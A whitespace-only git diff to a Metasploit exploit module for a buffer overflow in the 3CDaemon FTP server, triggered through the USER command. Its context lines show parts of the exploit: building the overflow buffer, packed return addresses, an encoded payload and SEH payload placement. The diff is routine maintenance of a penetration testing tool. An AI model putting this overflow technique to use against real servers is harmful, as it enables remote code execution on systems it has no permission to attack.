diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 991b9e325a..c87a502a8f 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -6,7 +6,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -27,10 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote This module uses the USER command to trigger the overflow. }, 'Author' => - [ + [ 'hdm', # Original author 'otr' # Windows XP SP3 - ], + ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => @@ -123,8 +123,8 @@ class Metasploit3 < Msf::Exploit::Remote buf << [ target['Ret'] ].pack('V') * 2 buf << payload.encoded else - buf = rand_text_english(2048, payload_badchars) - seh = generate_seh_payload(target.ret) + buf = rand_text_english(2048, payload_badchars) + seh = generate_seh_payload(target.ret) buf[target['Offset'], seh.length] = seh end